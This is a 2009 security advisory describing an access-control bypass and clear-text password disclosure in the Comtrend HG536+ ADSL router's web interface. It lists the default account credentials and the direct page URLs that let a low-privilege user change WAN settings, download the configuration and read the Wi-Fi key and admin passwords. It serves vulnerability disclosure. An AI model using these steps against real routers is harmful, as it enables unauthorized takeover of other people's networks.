##########################################
Comtrend HG536+ vulnerabilities
Vendor url:www.comtrend.com
Advisore Url:http://lostmon.blogspot.com/2009/04/
comtrend-hg536-vulnerabilities.html
Vendor notify: NO
#########################################

#####################
Description By vendor
#####################

The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.

################
Vulnerabilities
################

this device is by default with this settings:

==========================================
l LAN port IP address: 192.168.1.1
l Local administrator account name: admin
l Local administrator account password: admin
l Local non- administrator account name: user
l Local non- administrator account password: user
l Remote WAN access: disabled
l Remote WAN access account name: support
l Remote WAN access account password: support
l NAT: enable and firewall: disable
l DHCP server on LAN interface: enable
l WAN IP address: none
============================================

All Of this flaws are because the access control
is based in a ineffective javascript control in
'menuBcm.js' file that enables or disables view
items in the menu.html file, according of user
was logged in.

For this reason a minimal user , can call directly
all pages,that are parts of the web interface
bypassing the "pseudo restrictions" access role.

for exploit all flaws , a minimal account credentials
are required.

Vuln 1 => access Control error

if a user has access to non administrator user
by entering username "user" and password "user"
with this user only can update the firmware , manage
SNMP ,and view some status in the router ,and do
diagnostics , about adsl connectivity.This user
aparently is "restricted" to take some actions.

This router in this firmware version , has a
access control error and a user without privileges
( user-user) can access to all functions if he
make a direct request to the interested file or
functions.

example :

this user has no access to manage the setup of router
but by entering http://192.168.1.1/wancfg.cmd
he can configure the WAN settings.

download the config =>
http://192.168.1.1/backupsettings.html

view wireless key =>
http://192.168.1.1/wlsecurity.html



Vuln 2 => clear text admin passwords disclosure.

login in the router with user -user account
and open http://192.168.1.1/password.html
try to view the source code...

in the source we found :

=======================
pwdAdmin = 'admin';
pwdSupport = 'support;
pwdUser = 'user';
=======================


###############
versions
###############

Comtrend HG536+
firmware A101-302JAZ-C03_R14.A2pB021g.d15h

##############
Solution
#############

No solution was available at this time.

by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN.

configure to deny Wan connections and
Grant access to device ,only to trust users.

################# €nd #############
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....